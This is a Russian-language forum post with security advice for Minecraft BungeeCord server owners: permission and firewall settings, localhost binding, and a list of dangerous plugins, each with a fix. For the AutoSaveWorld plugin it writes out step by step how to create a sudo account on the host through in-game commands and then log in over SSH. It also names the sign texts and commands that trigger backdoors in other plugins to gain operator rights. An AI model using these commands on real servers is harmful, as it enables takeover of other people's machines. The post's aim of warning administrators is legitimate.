Перейти к публикации
Внимание! В связи с переходом на новую версию движка, сайт будет находиться в разработке! Все косяки в скором времени уберутся!

Рекомендованные сообщения

  • Создатель

Всем привет! Порыскав в интернете информацию о том, как защитить свой сервер и попытаюсь расписать все)

 

Спойлер

1. Переход на другой сервер без ввода пароля.
ОБЯЗАТЕЛЬНО уберите из конфига BungeeCord пермишнс " - bungeecord.command.server", команда /server идет не от сервера, а от прокси, поэтому игрок, не введя пароль, может использовать эту команду, взамен ее, если вы используете ChestCommands, привяжите к предметам меню команду COMMAND: 'server:survival'

 

2. Если у вас сервер стоит на Linux

С помощью Iptables вы закрываете порты всех серверов кроме "Лобби"

Вы должны войти в систему, чтобы просмотреть этот блок кода.

3. Если у вас сервер стоит на Windows

С помощью стандартного брандмауэра (позже выложу на канале видео)

 

4. Если у вас все стоит на одной машине (неважно Linux или Windows)

В конфиге BungeeCord выставляем значение ip_forward на true

На серверах в spigot.yml выставляем значение bungeecord на true

На серверах в server.properties выставляем значение server-ip на 127.0.0.1

 

Чтобы защитить сервер от ДОС атак, достаточно установить плагин AntiBotUltra.

 

Плагины:

1. AutoSaveWorld - С помощью него можно получить доступ к машине с помощью:

Спойлер

1) /asw process start ftp1 ls -la 
2) /asw process start ftp2 adduser (Свой ник);(Пароль);(Пароль);adduser (Свой ник) sudo;1;1;1;1;1;1;1;1;1;1;1;1; 
то-есть вот так: /asw process start ftp2 adduser 1_Ket_1;123321;123321;adduser 1_Ket_1 sudo;1;1;1;1;1;1;1;1;1;1;1;1;
Когда вы ввели команду, должно писать: process started 

Если что то не так, и process started не пишет, то попробуйте поменять ftp1 на ftp2 или по другому.
Всё получилось? Едем дальше.
заходим в Putty, и заполняем: 
Подключатся через ssh 
User: 1_Ket_1 (Тоесть свой ник, где вы указали его) 
Port: 22 или 21 
Password: 123321 (Тоесть свой пароль, где вы указали его) 

То-есть, добавление нового юзера со всеми правами. 
То-есть машина под твоим контролем...

Решение: Не выдавать полные права всем игрокам или отказаться от плагина

 

2. Autosave - Если на сервере стоит этот плагин, то с помощью него игрок может делать все что угодно, забанить игрока путем команды: /autosave ban nikname

Решение: Отказаться от плагина или использовать альтернативу

 

3. ProtocolLibFix - (Хак в плагине: /autoworld) С помощью плагина можно получить Опку с помощью таблички, прописав на ней CMBest

Решение: Отказаться от плагина или использовать последнюю версию

 

4. BukkitApiEnhancer - (Хак в плагине: /xhomexx) Тоже на получение Опки с помощью таблички, прописав на ней easyopz

Решение: Отказаться от плагина или использовать последнюю версию

 

Надеюсь вам эта статья вам поможет)

Ссылка на сообщение
Поделиться на других сайтах
S-Platoon.ru
Свободное место

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...

Важная информация

Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим.